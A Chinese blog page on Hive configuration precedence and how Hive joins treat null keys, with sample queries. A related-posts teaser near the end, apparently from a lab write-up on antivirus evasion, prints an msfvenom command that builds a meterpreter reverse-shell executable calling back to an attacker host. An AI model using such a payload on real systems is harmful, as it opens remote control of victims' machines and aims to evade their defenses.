hive 配置文件以及join中null值的处理「建议收藏」

hive 配置文件以及join中null值的处理

大家好,又见面了,我是全栈君。

一、Hive的參数设置

1.  三种设定方式:配置文件

·   用户自己定义配置文件:$HIVE_CONF_DIR/hive-site.xml

·   默认配置文件:$HIVE_CONF_DIR/hive-default.xml

用户自己定义配置会覆盖默认配置。

另外,Hive也会读入Hadoop的配置,由于Hive是作为Hadoop的client启动的,Hadoop的配置文件包含

·   $HADOOP_CONF_DIR/hive-site.xml

·   $HADOOP_CONF_DIR/hive-default.xml

Hive的配置会覆盖Hadoop的配置。

配置文件的设定对本机启动的全部Hive进程都有效。

2.  命令行參数 ,

bin/hive -hiveconf hive.root.logger=INFO,console

这一设定对本次启动的Session(对于Server方式启动。则是全部请求的Sessions)有效。

3.  參数声明

set mapred.reduce.tasks=100;

这一设定的作用域也是Session级的

二、使用hive一些注意的地方

1.  Hive使用的字符集默认是UTF-8。hive中没有转换字符编码的这样的函数

hive.exec.compress.output 这个參数, 默认是 false。

可是非常多时候貌似要单独显式设置一遍。否则会对结果做压缩的,假设你的这个文件后面还要在hadoop下直接操作, 那么就不能压缩了

2.  Join中处理null值的语义差别

这里的特殊逻辑指的是,Hive的Join中,作为Joinkey的字段比較。null=null是有意义的。且返回值为true。检查下面查询:

select u.uid, count(u.uid)

from t_weblog l join t_user u on (l.uid = u.uid) groupby u.uid;

查询中,t_weblog表中uid为空的记录将和t_user表中uid为空的记录做连接。即l.uid = u.uid=null成立。

假设须要与标准一致的语义。我们须要改写查询手动过滤null值的情况:

select u.uid, count(u.uid)

from t_weblog l join t_user u

on (l.uid = u.uid and l.uid is not null and u.uid is notnull)

group by u.uid;

实践中,这一语义差别也是常常导致数据倾斜的原因之中的一个。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/115574.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 第二章,springboot 配置,yaml 语法[通俗易懂]

    第二章,springboot 配置,yaml 语法[通俗易懂]第二章,springboot 配置,yaml 语法

    2022年4月24日
    33
  • 华硕笔记本r414u怎么安装键盘_华硕R414UV7200笔记本安装win7系统操作方法

    华硕笔记本r414u怎么安装键盘_华硕R414UV7200笔记本安装win7系统操作方法华硕R414UV7200笔记本搭载Intel酷睿i57200U处理器,拥有4GB内存以及500GB硬盘容量,极速读取和存储,电脑运行更高效。14英寸英寸的显示屏,屏幕分辨率达1366×768,画面自然,畅玩游戏更有身临其境的逼真效果,绝对让你乐不停。那么华硕R414UV7200怎么安装win7系统呢?下面就让我们一起来看看华硕R414UV7200安装win7系统的操作方法。安装准备工作:2、将…

    2022年5月15日
    50
  • 掩日免杀笔记_在线笔记

    掩日免杀笔记_在线笔记微信公众号:乌鸦安全扫取二维码获取更多信息!1.环境攻击机:kalilinux10.211.55.23受害机:Windows10360主动防御Windows7火绒主动防御2.生成exe文件在kalilinux下使用msfvenom生成一个64位的exe文件msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=10.211.55.23lport=4444-fexe…

    2022年8月22日
    4
  • ntp本地时间源 linux,简单搭建本地ntp时间服务器

    标签(空格分隔):Linuxntpntp阶梯式架构图NTP(NetworkTimeProtocol):同步网络中各个计算机时间的协议.ntp服务器监听端口为UDP的123.本地ntp时间服务器:在本地的一台可连接互联网的主机Server上安装实现NTP协议的应用,其它本地局域网的各主机都定期来这台时间服务器获取(同步)时间,以保证各计算机的时间一致.开始实验❶准备若干台虚拟机(我这里用3台…

    2022年4月8日
    87
  • 向量范数和矩阵范数的理解

    向量范数和矩阵范数的理解向量范数今天来聊一聊机器学习矩阵论的相关知识——范数(Norm)。在学习机器学习基础算法的推导过程中,可以看到很多地方都应用到了这个范数。范数属于矩阵论的知识范围,可见数学基础的重要性。机器学习的数学基础重点推荐——MIT的机器学习数学基础课如果只需要快速了解,请参考——矩阵范数计算完整的MIT数学基础课程笔记可以参考:MIT18.06线性代数笔记这是个非常棒的手动演算流程,本文也将编码进行验算。向量范数定义:一个向量空间V到实数空间的映射,不仅如此,还要满足喜爱额条件:∣∣x∣∣⩾

    2022年9月18日
    0
  • 用户代码未处理MetadataException

    用户代码未处理MetadataException用户代码未处理MetadataException

    2022年4月24日
    33

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号